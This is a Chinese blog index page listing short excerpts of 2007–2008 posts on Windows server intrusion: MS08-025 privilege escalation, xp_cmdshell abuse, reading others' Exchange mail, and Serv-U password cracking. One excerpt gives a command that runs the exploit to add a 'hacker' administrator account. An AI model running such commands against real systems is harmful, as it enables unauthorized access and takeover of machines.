随笔 - 227,  文章 - 5,  评论 - 71
上一页 1 2 3 4 5 6 7 8 ··· 23 下一页
  2008年4月21日
摘要:真正可用的MS08025。 为了多次运行,服务器蓝屏,请直接用一次运行所有的命令 比如: MS08025 "cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add" Local Privilege Escalation Vulnerability Exp... 阅读全文
posted @ 2008-04-21 10:09 %5C 阅读(929) 评论(0) 推荐(0) 编辑
  2008年4月16日
摘要:1....Server2K的Printer 2....secdrv.SYS提权 3....Sql server? 4....Tomcat 5....Java Weblet 6....MS08025 7....PhpWebshell+Mysql 8....社工密码 阅读全文
posted @ 2008-04-16 11:34 %5C 阅读(427) 评论(0) 推荐(0) 编辑
摘要:现在很多企业都搭建ExchangeServer平台,一个用户包括Domain admins都是不允许查阅其他用户的邮件信息的! 殊不知作为Domain Admins权限用户可以经过精心的设置,可以达到浏览到其他用户邮件信息! 阅读全文
posted @ 2008-04-16 11:25 %5C 阅读(237) 评论(0) 推荐(0) 编辑
摘要:最早1986提出的access数据库执行系统命令,结果忽悠了一圈人 哈哈 不过这个public权限执行系统命令也算是个鸡肋…. YY 一下 安慰一下被我忽悠的同志们 很多朋友说public权限不能执行命令 其实是可以执行的~ 但是前提是启动 Sql server Agent 服务 其实SQL Server Agent 是一个任务规划器和警报管理器 默认安装 sql server是不开启的 不过... 阅读全文
posted @ 2008-04-16 11:21 %5C 阅读(532) 评论(1) 推荐(0) 编辑
  2008年4月14日
摘要:To save some of you from SQL Server 2005 Books Online, this quick bit of SQL will enable xp_cmdshell to execute, if you don't want to use the SQL Server 2005 Surface Area Configuration tool. Clearly ... 阅读全文
posted @ 2008-04-14 10:24 %5C 阅读(2945) 评论(0) 推荐(0) 编辑
  2008年1月7日
摘要:相信大多数朋友都是iframe木马的受害者,有朋友的网站被注入了N回iframe,心情可想而知。而且现在ARP攻击,注入iframe也是轻而易举的事,仅局域网里都时刻面临威胁,哎,什么世道。 灵儿曾经在经典论坛上发过贴子:《一行代码解决网站防挂IFRAME木马方案》http://bbs.blueidea.com/thread-2785512-1-1.html ,有不少朋友都联系了灵儿,有的表示感... 阅读全文
posted @ 2008-01-07 14:30 %5C 阅读(635) 评论(0) 推荐(0) 编辑
  2007年12月4日
摘要: 阅读全文
posted @ 2007-12-04 10:07 %5C 阅读(561) 评论(0) 推荐(0) 编辑
  2007年12月3日
摘要:对外开放80,1433,3389端口,且此服务器上只放该站一个站点,而且后台密码是写在ASP文件里的(前面猜表时并未找到后台相关的表,于是猜测对方是把密码写在ASP文件里了,进去后肯定了我的猜测)。网络上公认的危险存储扩展均被删除,且无法恢复。(后来确认是 odsole70.dll,xplog70.dll,xpstar.dll三个DLL被删除)这三个DLL的删除,意味着N多的存储扩展用不了了。 ... 阅读全文
posted @ 2007-12-03 10:10 %5C 阅读(4142) 评论(0) 推荐(1) 编辑
  2007年11月30日
摘要:方法一:爆破法. 最显眼的要属用户名和密码了,关键是如何破密码呢?到网上搜了一个专门破SERV-U密码的工具(Serv-UPassCrack1.0a.rar),太慢了,这要等到何年何月啊!干脆用记事本打开它的脚本crack.vbs.看看解密原理:假设原来明文密码用"password_mingwen"表示,密文密码也就是 我们在ServUDaemon.ini中看到的密码(34位),用"pa... 阅读全文
posted @ 2007-11-30 10:23 %5C 阅读(1884) 评论(0) 推荐(0) 编辑
  2007年11月15日
摘要:cdb_access 用户权限表 cdb_adminactions 管理动作表 cdb_admingroups 管理组数据表 cdb_adminnotes 管理员留言 cdb_adminsessions 管理员后台在线记录 cdb_advertisements 广告资料表 c... 阅读全文
posted @ 2007-11-15 03:13 %5C 阅读(2172) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 ··· 23 下一页